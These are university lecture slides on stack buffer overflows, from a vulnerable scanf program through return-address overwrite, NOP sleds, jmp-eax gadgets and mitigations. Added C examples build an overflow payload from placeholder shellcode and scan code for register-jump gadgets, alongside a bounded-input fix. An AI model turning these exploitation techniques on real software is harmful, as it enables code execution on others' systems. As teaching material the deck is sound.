
Buffer Overflows - Ian Kayne, for School of Computer Science, University of Birmingham, 16th February 2009


1 Buffer Overflows (title slide)

2 Welcome (slide footer date: 02/20/09)
- Introduction
- Topics to be covered
- Useful areas of existing knowledge

3 Security Flaws
- User input? Buffer overflow!
- One of the most common coding flaws

    #include <stdio.h>

    int main() {
        char szName[10];
        printf("Please enter your name: ");
        scanf("%s", szName);    /* no width limit: any input longer than 9 bytes overflows szName */
        printf("Hello, %s!", szName);
        return 0;
    }

4 Buffer Overflows
- What is a buffer overflow?
- How does it work?
- "The stack": a Last In First Out area of memory
- Stack addressing: grows downwards, so the highest addresses are used first and each push lands at a lower address
- Stores local variables (data), parameters, saved frame pointers and return addresses

5 The Stack
- Section of the stack (representative)
[Figure: a slice of the stack from 0x00004BF0 to 0x00004C5F, one 16-byte row per line. The lowest rows (0x00004BF0-0x00004BFF) are free; at higher addresses come rows of data, the buffer, more data, then the saved previous ebp and the return address, followed by further data up to 0x00004C5F. ebp points at the saved frame pointer.]

6 The Stack
- How does this relate to code?
[Figure: the same stack rows, now labelled: data, the buffer (szName), data, saved ebp, return address.]

    #include <stdio.h>

    int main() {
        char szName[10];
        printf("Please enter your name: ");
        scanf("%s", szName);    /* szName is the 10-byte buffer shown in the figure */
        printf("Hello, %s!", szName);
        return 0;
    }

7 Buffer Overflow
- Short names work: they fit in the buffer ("Ian Kayne\0" is exactly 10 bytes, the size of szName)
- Long names will break the code: "123456789A" fills the buffer, and the "AAAAAAAAAAAA" that follows runs on over the saved data and the return address

8 Buffer Overflow
- Interesting error, look closely!
- Big security warning!

9 Buffer Overflow
- Look at our stack representation again:
[Figure: data | buffer | data | frame pointer | return address]
- First we filled the buffer (bytes 0 1 2 3 4 5 6 7 8 9)...
- ...then we overflowed into the frame pointer and the return address (A A A A A)

10 Buffer Overflow
- 0x41414141 is "41 41 41 41" in memory, the ASCII code for "AAAA": the faulting address in the crash is made entirely of our input bytes, because the CPU tried to return to that address

11 Buffer Overflow
- Why do we want a buffer overflow?
- Code execution
- Our code runs in the victim process's security context
- How do we get from crash to code?

12 Buffer Overflow - Review
- Recap:
- "Grow downwards": the largest address is used first
- The stack stores data
- Every function call pushes a return address onto the stack; in the usual x86 frame the saved ebp sits just below it, so the return address is at [ebp+4]
- Unchecked data lengths can overflow buffers
- Overflow and overwrite the return address
- So how do we get from crash to code?

13 Buffer Overflow
- Executable stack (the classic case; see the prevention slide for what stops it)
- Provide shellcode/payload as buffer input
- Overwrite the return address with the buffer address
- What is shellcode?
- Difference between asm, machine code and shellcode
- Bad characters: NULs, high ASCII, white space etc. that the input path will not pass through to the buffer

14 Buffer Overflow
- First, write our shellcode:
  Pseudocode: GetUsername(); ElevatePrivilege();
  Pseudo-shellcode (illustrative bytes, not real machine code): \x6a\x35\x59\xe8\xff\xc1\x5e\x30\x4c\x0e
- Metasploit and other tools make this easy!
- Append the address pointing to the start of the buffer:
  Pseudo-shellcode: \x6a\x35\x59\xe8\xff\xc1\x5e\x30\x4c\x0e \x2C\x4C\x00\x00

15 Buffer Overflow
- Our shellcode maps to the stack layout:
[Figure: data | return address, with the 14 bytes \x6a\x35\x59\xe8\xff\xc1\x5e\x30\x4c\x0e\x2C\x4C\x00\x00 laid over them: the first 10 bytes fill szName and the last 4 land on the return address]
- Note: the figure places the return address directly after the 10-byte buffer; in a real frame the saved ebp (and any padding) sits between them, so the payload needs filler bytes up to the return-address slot

    #include <stdio.h>

    int main() {
        char szName[10];
        printf("Please enter your name: ");
        scanf("%s", szName);    /* the 14-byte payload above is read straight into this buffer */
        printf("Hello, %s!", szName);
        return 0;
    }

16 Buffer Overflow
- One mystery left!
- What is \x2C\x4C\x00\x00 ?
[Figure: stack rows 0x00004C10-0x00004C1F, 0x00004C20-0x00004C2F, 0x00004C30-0x00004C3F, with the buffer starting inside the 0x00004C20 row]
- Endian-ness: x86 is little-endian, so the buffer address 0x00004c2c is stored least-significant byte first, as 2C 4C 00 00
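The steps on slides 13 to 16 (shellcode into the buffer, address of the buffer appended, little-endian byte order, bad characters) can be carried out in a few lines of C. The following is an added example written for this transcript, not code from the slides: it builds the 14-byte payload from slide 14 from the slides' own illustrative bytes, encodes the slide 16 address 0x00004c2c little-endian, and then screens the result for bytes the input path will not deliver. The pad_len parameter, RET_ADDR name and the wrapper functions are this example's own assumptions; the "shellcode" bytes are the placeholders from slide 14 and do not execute anything.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN 10            /* szName[10] from the vulnerable program */
#define RET_ADDR 0x00004c2cu  /* start of the buffer, per slide 16 (illustrative value) */

/* Placeholder bytes copied from slide 14; they are not real machine code. */
static const uint8_t pseudo_shellcode[BUF_LEN] =
    { 0x6a, 0x35, 0x59, 0xe8, 0xff, 0xc1, 0x5e, 0x30, 0x4c, 0x0e };

/* Store a 32-bit value the way x86 keeps it in memory: least-significant
 * byte first, so 0x00004c2c becomes 2c 4c 00 00. */
void put_le32(uint8_t *out, uint32_t v) {
    out[0] = (uint8_t)(v);
    out[1] = (uint8_t)(v >> 8);
    out[2] = (uint8_t)(v >> 16);
    out[3] = (uint8_t)(v >> 24);
}

/* Layout: shellcode (fills the buffer) | pad_len filler bytes | return address.
 * pad_len covers whatever sits between the end of the buffer and the saved
 * return address (saved ebp, alignment); slide 15 draws it as zero.
 * Returns the payload length, or -1 if out is too small. */
int build_payload(uint8_t *out, size_t outlen, size_t pad_len, uint32_t ret) {
    size_t total = BUF_LEN + pad_len + 4;
    if (outlen < total) return -1;
    memcpy(out, pseudo_shellcode, BUF_LEN);
    memset(out + BUF_LEN, 0x90, pad_len);   /* NOP filler; any byte would do here */
    put_le32(out + BUF_LEN + pad_len, ret);
    return (int)total;
}

/* scanf("%s") stops at the first white-space byte, and strcpy-style copies
 * stop at NUL. Return the index of the first byte the chosen input path would
 * not deliver, or -1 if the payload is clean for that path. */
int first_bad_byte(const uint8_t *p, size_t len, int nul_is_bad) {
    for (size_t i = 0; i < len; i++) {
        if (isspace(p[i])) return (int)i;
        if (nul_is_bad && p[i] == 0x00) return (int)i;
    }
    return -1;
}

/* Wrappers so the result can be inspected without the caller owning a buffer. */
int payload_len(size_t pad_len) {
    uint8_t buf[64];
    return build_payload(buf, sizeof buf, pad_len, RET_ADDR);
}
int payload_byte(size_t pad_len, size_t i) {
    uint8_t buf[64];
    int n = build_payload(buf, sizeof buf, pad_len, RET_ADDR);
    return (n < 0 || i >= (size_t)n) ? -1 : buf[i];
}
int payload_first_bad(size_t pad_len, int nul_is_bad) {
    uint8_t buf[64];
    int n = build_payload(buf, sizeof buf, pad_len, RET_ADDR);
    return n < 0 ? -2 : first_bad_byte(buf, (size_t)n, nul_is_bad);
}

int main(void) {
    uint8_t buf[64];
    int n = build_payload(buf, sizeof buf, 0, RET_ADDR);
    for (int i = 0; i < n; i++) printf("\\x%02x", buf[i]);
    printf("\nfirst bad byte for scanf(\"%%s\"): %d, for strcpy: %d\n",
           first_bad_byte(buf, n, 0), first_bad_byte(buf, n, 1));
    return 0;
}
```

The screening step makes the slide 13 point about NULs concrete: the slides' payload passes through scanf("%s"), which only stops at white space, but the two zero bytes in 0x00004c2c would terminate a strcpy-style copy at index 12, so a target that copies with strcpy needs a return address with no zero bytes (a reason the later slides move to jump-using-register gadgets).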

17 Buffer Overflow
- Buffer Overflow Demonstration

18 Metasploit

19 Metasploit

20 Metasploit

21 Buffer Overflow
- A direct jump to a fixed buffer address is unreliable
- Rebasing (especially DLLs) and differing environments move the buffer around
- "NOP sleds":
- NOP sled first, then...
- shellcode, then...
- overwrite the return address with any address inside the sled; execution slides through the NOPs into the shellcode, so the guess only has to land somewhere in the sled
- A better method is to jump using a register

22 Buffer Overflow
- Jump using register
- At the moment of the ret, some register (here EAX) often already points at the start of the buffer
- Inject shellcode into the buffer as normal
- Overwrite the return address with the address of an instruction that jumps through that register (a "jmp eax" found in a module loaded at a known, non-rebased address)
- Near-guaranteed success: no guessing of the buffer address at all
[Figure: data | shellcode | return address; EAX points at the shellcode. Gadget in a loaded module:
    test ecx, ecx
    jmp eax
    push 12345678]
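Finding the "jmp eax" gadget the slide relies on is a byte-pattern search over a module's code. The following is an added example written for this transcript, not the slides' or Metasploit's code: find_jmp_reg() scans raw bytes for the x86 encodings of jmp reg (FF E0+r), call reg (FF D0+r) and push reg; ret (50+r C3), which are the three forms exploit tools look for. The scanned bytes are a constructed stand-in for a loaded module that contains the slide's "test ecx, ecx / jmp eax / push 12345678" sequence, and FAKE_BASE is a hypothetical load address; the enum and function names are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Register numbers as x86 encodes them in the ModRM r/m field. */
enum { REG_EAX = 0, REG_ECX, REG_EDX, REG_EBX, REG_ESP, REG_EBP, REG_ESI, REG_EDI };

/* Scan raw code bytes for a "jump using register" gadget:
 *   FF E0+r   jmp  reg
 *   FF D0+r   call reg
 *   50+r C3   push reg ; ret
 * x86 has no instruction alignment, so a match that starts inside a longer
 * instruction is still usable. Returns the offset of the first hit and sets
 * *kind, or -1 if none is found. */
long find_jmp_reg(const uint8_t *code, size_t len, int reg, const char **kind) {
    for (size_t i = 0; i + 1 < len; i++) {
        uint8_t b0 = code[i], b1 = code[i + 1];
        if (b0 == 0xff && b1 == (uint8_t)(0xe0 + reg)) { *kind = "jmp reg";       return (long)i; }
        if (b0 == 0xff && b1 == (uint8_t)(0xd0 + reg)) { *kind = "call reg";      return (long)i; }
        if (b0 == (uint8_t)(0x50 + reg) && b1 == 0xc3) { *kind = "push reg; ret"; return (long)i; }
    }
    return -1;
}

/* Constructed stand-in for a loaded module (not a real DLL): a little filler,
 * then the "test ecx, ecx / jmp eax / push 12345678" sequence from slide 22. */
static const uint8_t fake_module[] = {
    0x55, 0x89, 0xe5,                    /* push ebp ; mov ebp, esp */
    0x8b, 0x45, 0x08,                    /* mov eax, [ebp+8] */
    0x85, 0xc9,                          /* test ecx, ecx */
    0xff, 0xe0,                          /* jmp eax            <- offset 8 */
    0x68, 0x78, 0x56, 0x34, 0x12,        /* push 0x12345678 */
    0x5d,                                /* pop ebp */
    0xc3                                 /* ret */
};

/* Hypothetical load address of fake_module. A real search needs the module's
 * actual base, and a module that is not rebased or randomised between runs. */
#define FAKE_BASE 0x10001000u

long jmp_reg_offset(int reg) {
    const char *kind;
    return find_jmp_reg(fake_module, sizeof fake_module, reg, &kind);
}

/* The value to write over the saved return address, or 0 if no gadget exists. */
uint32_t jmp_reg_address(int reg) {
    long off = jmp_reg_offset(reg);
    return off < 0 ? 0 : FAKE_BASE + (uint32_t)off;
}

int main(void) {
    static const char *names[] = { "eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi" };
    for (int r = REG_EAX; r <= REG_EDI; r++) {
        const char *kind = "";
        long off = find_jmp_reg(fake_module, sizeof fake_module, r, &kind);
        if (off >= 0)
            printf("%s: 0x%08x (%s)\n", names[r], FAKE_BASE + (uint32_t)off, kind);
        else
            printf("%s: no gadget\n", names[r]);
    }
    return 0;
}
```

Two things to check on any hit before using it: the resulting address must itself be free of bad characters (0x10001008 here contains no NUL byte, unlike the slides' 0x00004c2c), and the module must be one that loads at the same base every time, which is exactly what the address randomisation on the next slide takes away.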

23 Prevention
- Non-executable stack ("NX bit", DEP): shellcode placed in the buffer cannot be executed
- Address randomisation (ASLR): buffer and module addresses change between runs, so fixed addresses and jump-through-register gadgets in randomised modules stop working
- Canary bytes: a value placed between the buffer and the return address and checked before the function returns; an overflow that reaches the return address changes it
[Figure: data | return address]
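The mitigations above raise the cost of exploitation; the actual fix for the slide 3 program is to bound the read. The following is an added example written for this transcript, not code from the slides: read_name() is a drop-in for scanf("%s", szName) that keeps the 10-byte buffer, stops at white space like the original, and rejects (rather than silently truncates) a name that does not fit. It takes its input from a string so it can be checked offline; main() does the same from stdin via fgets. NAME_LEN and the function names are this example's own.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define NAME_LEN 10   /* same size as szName[10] in the vulnerable program */

/* Bounded replacement for scanf("%s", szName). "%9s" reads at most 9 bytes and
 * leaves room for the terminating NUL; "%n" records how much input was
 * consumed so we can tell whether the token was cut off. Returns 0 on success,
 * -1 if there was no token or it would not fit (name is then left empty). */
int read_name(const char *input, char name[NAME_LEN]) {
    int consumed = 0;
    name[0] = '\0';
    if (sscanf(input, "%9s%n", name, &consumed) != 1)
        return -1;
    /* A non-space byte right after the 9 we took means the name was longer. */
    if (input[consumed] != '\0' && !isspace((unsigned char)input[consumed])) {
        name[0] = '\0';
        return -1;
    }
    return 0;
}

/* Check helper: 1 if input is accepted and read as expected, else 0. */
int name_reads_as(const char *input, const char *expected) {
    char name[NAME_LEN];
    if (read_name(input, name) != 0) return 0;
    return strcmp(name, expected) == 0;
}

int main(void) {
    char line[256];
    char szName[NAME_LEN];

    printf("Please enter your name: ");
    fflush(stdout);
    /* fgets never writes past sizeof line; anything beyond stays in stdin. */
    if (fgets(line, sizeof line, stdin) == NULL)
        return 1;
    if (read_name(line, szName) != 0) {
        fprintf(stderr, "Name too long (max %d characters)\n", NAME_LEN - 1);
        return 1;
    }
    printf("Hello, %s!\n", szName);
    return 0;
}
```

Rejecting over-long input, rather than quietly keeping the first 9 bytes, is the safer default: silent truncation can turn a valid name into a different valid name, and it hides the fact that someone is probing the length limit.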

24 Buffer Overflow
- Recap and review
- There is a lot more to buffer overflows; some detail has been cut out for clarity.
- Stack diagrams are representations only and are not technically accurate
- Metasploit (www.metasploit.com)
- "Smashing the stack for fun and profit": http://insecure.org/stf/smashstack.html

25 Buffer Overflows
- Basic principles
- The flaw is possible with any buffer operation:
- User input
- Data loaded from disk
- Data from the network

26 Review
- Thank you!
- Questions
- Comments
- Items to review
- Further study

